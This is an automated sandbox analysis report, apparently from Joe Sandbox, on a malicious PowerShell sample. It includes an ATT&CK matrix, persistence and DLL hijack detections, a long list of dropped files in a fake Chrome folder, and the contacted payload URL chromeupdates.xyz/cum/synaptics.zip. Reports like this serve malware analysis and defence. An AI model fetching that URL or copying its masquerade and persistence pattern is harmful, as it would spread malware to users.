Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
PowerShell		2
Registry Run Keys / Startup Folder		12
Process Injection		11
Masquerading		OS Credential Dumping1
System Time Discovery		Remote Services1
Archive Collected Data		21
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading		2
Registry Run Keys / Startup Folder		31
Virtualization/Sandbox Evasion		LSASS Memory31
Security Software Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading		12
Process Injection		Security Account Manager2
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information		NTDS31
Virtualization/Sandbox Evasion		Distributed Component Object ModelInput Capture13
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials2
File and Directory Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync34
System Information Discovery		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1556280 Sample: protected.ps1 Startdate: 15/11/2024 Architecture: WINDOWS Score: 64 43 chromeupdates.xyz 2->43 45 x1.i.lencr.org 2->45 47 4 other IPs or domains 2->47 57 Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE 2->57 59 AI detected suspicious sample 2->59 61 Sigma detected: Dot net compiler compiles file from suspicious location 2->61 63 Sigma detected: Powerup Write Hijack DLL 2->63 9 powershell.exe 16 1007 2->9         started        14 svchost.exe 2->14         started        16 synaptics.exe 2->16         started        signatures3 65 Performs DNS queries to domains with low reputation 43->65 process4 dnsIp5 49 chromeupdates.xyz 202.92.4.57, 443, 49704 VNPT-AS-VNVNPTCorpVN Viet Nam 9->49 51 edge-block-www-env.dropbox-dns.com 162.125.65.15, 443, 49784 DROPBOXUS United States 9->51 53 www-env.dropbox-dns.com 162.125.65.18, 443, 49773 DROPBOXUS United States 9->53 35 C:\Users\user\AppData\Local\...\synaptics.exe, PE32 9->35 dropped 37 C:\Users\user\AppData\Local\...\python310.dll, PE32 9->37 dropped 39 C:\Users\user\AppData\Local\...\adsi.pyd, PE32 9->39 dropped 41 871 other files (76 malicious) 9->41 dropped 67 Powershell drops PE file 9->67 18 Acrobat.exe 20 66 9->18         started        20 csc.exe 3 9->20         started        23 synaptics.exe 20 9->23         started        25 conhost.exe 9->25         started        55 127.0.0.1 unknown unknown 14->55 file6 signatures7 process8 file9 27 AcroCEF.exe 106 18->27         started        33 C:\Users\user\AppData\Local\...\o3u40tef.dll, PE32 20->33 dropped 29 cvtres.exe 1 20->29         started        process10 process11 31 AcroCEF.exe 27->31         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
protected.ps10%ReversingLabs
protected.ps13%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\ChromeApplication\DLLs\_asyncio.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\_bz2.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\_ctypes.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\_decimal.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\_elementtree.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\_hashlib.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\_lzma.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\_msi.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\_multiprocessing.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\_overlapped.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\_queue.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\_socket.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\_sqlite3.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\_ssl.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\_uuid.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\_zoneinfo.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\libcrypto-1_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\libffi-7.dll0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\libssl-1_1.dll0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\pyexpat.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\select.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\sqlite3.dll0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\unicodedata.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\DLLs\winsound.pyd0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\__future__.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\_aix_support.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\_bootsubprocess.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\_collections_abc.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\_compression.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\_markupbase.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\_osx_support.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\_py_abc.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\_pyio.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\_sitebuiltins.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\_strptime.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\_threading_local.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\_weakrefset.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\abc.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\aifc.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\argparse.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ast.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\asynchat.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\asyncore.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\base64.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\bdb.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\binhex.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\bisect.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\bz2.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\cProfile.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\calendar.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\cgi.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\cgitb.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\chunk.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\cmd.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\code.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\codecs.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\collections\__init__.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\collections\abc.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\colorsys.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\compileall.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\concurrent\futures\__init__.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\concurrent\futures\_base.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\concurrent\futures\process.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\concurrent\futures\thread.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\configparser.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\contextlib.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\contextvars.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\copy.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\copyreg.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\crypt.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\csv.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\macholib\__init__.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\macholib\dyld.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\macholib\dylib.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\macholib\fetch_macholib0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\macholib\framework.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_anon.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_array_in_pointer.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_arrays.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_as_parameter.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_bitfields.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_buffers.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_bytes.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_byteswap.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_callbacks.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_cast.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_cfuncs.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_checkretval.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_delattr.py0%ReversingLabs
C:\Users\user\AppData\Local\ChromeApplication\Lib\ctypes\test\test_errno.py0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
chromeupdates.xyz1%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://192.168.0.1/Python/interrupt/test.asp0%Avira URL Cloudsafe
https://bugs.python.org/issue396820%Avira URL Cloudsafe
http://ucdfbc3902915a267069329ce5e2.dl.dropboxusercontent.com0%Avira URL Cloudsafe
http://zooko.com/0%Avira URL Cloudsafe
https://eprint.iacr.org/2013/157.pdf0%Avira URL Cloudsafe
http://bugs.python.org/issue196190%Avira URL Cloudsafe
https://bugs.python.org/issue292550%Avira URL Cloudsafe
http://zooko.com/0%VirustotalBrowse
https://eprint.iacr.org/2013/157.pdf0%VirustotalBrowse
http://bugs.python.org/issue5845#msg1986360%Avira URL Cloudsafe
https://ucdfbc3902915a267069329ce5e2.dl.dropboxusercontent.com0%Avira URL Cloudsafe
http://bugs.python.org/issue147200%Avira URL Cloudsafe
https://misc.daniel-marschall.de/asn.1/oid-converter/online.php0%Avira URL Cloudsafe
https://chromeupdates.xyz/cum/synaptics.zip0%Avira URL Cloudsafe
https://officeapps-df.live.com0%Avira URL Cloudsafe
http://bugs.python.org/issue14396.0%Avira URL Cloudsafe
http://pyfpdf.googlecode.com/)0%Avira URL Cloudsafe
https://foss.heptapod.net/pypy/pypy/-/blob/be829135bc0d758997b3566062999ee8b23872b4/lib-python/3/sit0%Avira URL Cloudsafe
https://docs.sandbox.google.com/document/fsip/0%Avira URL Cloudsafe
http://www.alvestrand.no/objectid/1.2.840.113549.1.1.1.html0%Avira URL Cloudsafe
http://www.egenix.com/files/python/platform.py0%Avira URL Cloudsafe
http://starship.python.net/crew/mhammond/win32/PrivacyProblem.html0%Avira URL Cloudsafe
http://www.gzip.org/#faq80%Avira URL Cloudsafe
https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/0%Avira URL Cloudsafe
http://shellrevealed.com/blogs/shellblog/archive/2007/03/15/Shell-Namespace-Extension_3A00_-Creating0%Avira URL Cloudsafe
http://192.168.0.1/Python/interrupt/test1.asp0%Avira URL Cloudsafe
https://selfguidedlearning.dropboxbusiness.com/0%Avira URL Cloudsafe
http://bugs.python.org/issue108110%Avira URL Cloudsafe
https://docs.sandbox.google.com/presentation/fsip/0%Avira URL Cloudsafe
https://app.hellofax.com/0%Avira URL Cloudsafe
https://bugs.python.org/issue432850%Avira URL Cloudsafe
https://www.oss.com/asn1/resources/books-whitepapers-pubs/larmouth-asn1-book.pdf0%Avira URL Cloudsafe
https://www.hellofax.com/0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
chromeupdates.xyz
202.92.4.57
truetrueunknown
edge-block-www-env.dropbox-dns.com
162.125.65.15
truefalse
    		high
    www-env.dropbox-dns.com
    		162.125.65.18
    		truefalse
      		high
      ucdfbc3902915a267069329ce5e2.dl.dropboxusercontent.com
      		unknown
      		unknownfalse
        		unknown
        x1.i.lencr.org
        		unknown
        		unknownfalse
          		high
          www.dropbox.com
          		unknown
          		unknownfalse
            		high

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://chromeupdates.xyz/cum/synaptics.zipfalse
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-108r1.pdfKDF.py.0.drfalse
              		high
              http://www.dropbox.compowershell.exe, 00000000.00000002.2376887692.0000015C01E54000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                https://github.com/mhammond/pywin32powershell.exe, 00000000.00000002.2376887692.0000015C00BB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C010DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00E83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00CDA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00B39000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00E76000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00B2F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C009D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00E97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00FEA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00C41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0226F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00A63000.00000004.00000800.00020000.00000000.sdmp, win32profile.pyd.0.dr, win32clipboard.pyd.0.dr, win32api.pyd.0.dr, win32pdh.pyd.0.drfalse
                  		high
                  https://paper.dropbox.com/cloud-docs/editpowershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://bugs.python.org/issue6857.powershell.exe, 00000000.00000002.2376887692.0000015C01B6F000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      http://zooko.com/powershell.exe, 00000000.00000002.2376887692.0000015C01771000.00000004.00000800.00020000.00000000.sdmpfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://eprint.iacr.org/2013/157.pdftest_GCM.py.0.drfalse
                      • 0%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown
                      https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000009.00000003.2383892842.0000028541D60000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        https://app.hellosign.com/powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://bugs.python.org/issue39682pathlib.py.0.drfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://python.org/dev/peps/pep-0263/synaptics.exe, synaptics.exe, 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmp, synaptics.exe, 0000000E.00000002.2496158188.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpfalse
                            		high
                            https://www.dropbox.com/powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://192.168.0.1/Python/interrupt/test.asppowershell.exe, 00000000.00000002.2376887692.0000015C02416000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0240A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0242A000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://ucdfbc3902915a267069329ce5e2.dl.dropboxusercontent.compowershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.schneier.com/code/vectors.txttest_Blowfish.py.0.drfalse
                                		high
                                https://bugs.python.org/issue29255selectors.py.0.drfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://web.archive.org/web/20200623061726/https://bitbucket.org/pitrou/pathlib/issues/12/pathlib.py.0.drfalse
                                  		high
                                  http://w3m.sourceforge.net/powershell.exe, 00000000.00000002.2376887692.0000015C019E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C019D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://bugs.python.org/issue19619synaptics.exe, 00000007.00000003.2374767343.0000000000B1F000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000007.00000003.2376940988.0000000000B16000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000007.00000003.2374931652.0000000000B12000.00000004.00000020.00020000.00000000.sdmp, codecs.py.0.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.docsend.com/powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.planetpublish.com/xmlarena/xap/Thursday/WordtoXML.pdfpowershell.exe, 00000000.00000002.2376887692.0000015C01B2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01B38000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://www.ibm.com/powershell.exe, 00000000.00000002.2376887692.0000015C01A90000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01A83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01AA6000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://bugs.python.org/issue5845#msg198636powershell.exe, 00000000.00000002.2376887692.0000015C011EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C011F4000.00000004.00000800.00020000.00000000.sdmp, synaptics.exe, 00000007.00000003.2378074084.0000000000B22000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://docs.python.org/X.Y/library/pydoc.py.0.drfalse
                                            		high
                                            https://docs.python.org/pydoc.py.0.drfalse
                                              		high
                                              https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.2443745513.0000015C10072000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2443745513.0000015C101B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://bugs.python.org/issue14720powershell.exe, 00000000.00000002.2376887692.0000015C013A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C013AE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://ucdfbc3902915a267069329ce5e2.dl.dropboxusercontent.compowershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.geocities.com/rick_lively/MANUALS/ENV/MSWIN/PROCESSI.HTMplatform.py.0.drfalse
                                                  		high
                                                  https://misc.daniel-marschall.de/asn.1/oid-converter/online.phpasn1.py.0.drfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://edge-block-www-env.dropbox-dns.compowershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.dropboxstatic.com/static/powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://officeapps-df.live.compowershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://api.login.yahoo.com/powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.2376887692.0000015C00001000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://login.yahoo.com/powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://www.dropbox.com/playlist/powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://onedrive.live.com/pickerpowershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://www.dropbox.compowershell.exe, 00000000.00000002.2376887692.0000015C01E54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://bugs.python.org/issue14396.powershell.exe, 00000000.00000002.2376887692.0000015C0158E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      http://www.python.orgpowershell.exe, 00000000.00000002.2376887692.0000015C007D7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://foo.com/client.py.0.drfalse
                                                                          		high
                                                                          https://contoso.com/Iconpowershell.exe, 00000000.00000002.2443745513.0000015C101B5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://php.net/manual/en/function.version-compare.phpplatform.py.0.drfalse
                                                                              		high
                                                                              http://crl.ver)svchost.exe, 00000009.00000002.3306223761.000002854208D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/gcm/gcm-revised-spec.pdftest_GCM.py.0.drfalse
                                                                                  		high
                                                                                  http://pyfpdf.googlecode.com/)powershell.exe, 00000000.00000002.2376887692.0000015C01E88000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C00556000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://sourceware.org/pthreads-win32/manual/pthread_barrier_init.htmlpowershell.exe, 00000000.00000002.2376887692.0000015C016E8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.ietf.org/rfc/rfc3447.txtRSA.py.0.drfalse
                                                                                      		high
                                                                                      https://foss.heptapod.net/pypy/pypy/-/blob/be829135bc0d758997b3566062999ee8b23872b4/lib-python/3/sitpowershell.exe, 00000000.00000002.2376887692.0000015C011D6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C011CB000.00000004.00000800.00020000.00000000.sdmp, synaptics.exe, 00000007.00000003.2395189100.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp, synaptics.exe, 00000007.00000003.2395047103.0000000000AFC000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      		unknown
                                                                                      https://www.dropbox.com/v/s/playlist/powershell.exe, 00000000.00000002.2376887692.0000015C00225000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C0055A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2376887692.0000015C01E66000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://www.python.org/dev/peps/pep-%04d/pydoc.py.0.drfalse
                                                                                          		high
                                                                                          http://www-env.dropbox-dns.compowershell.exe, 00000000.00000002.2376887692.0000015C01E54000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
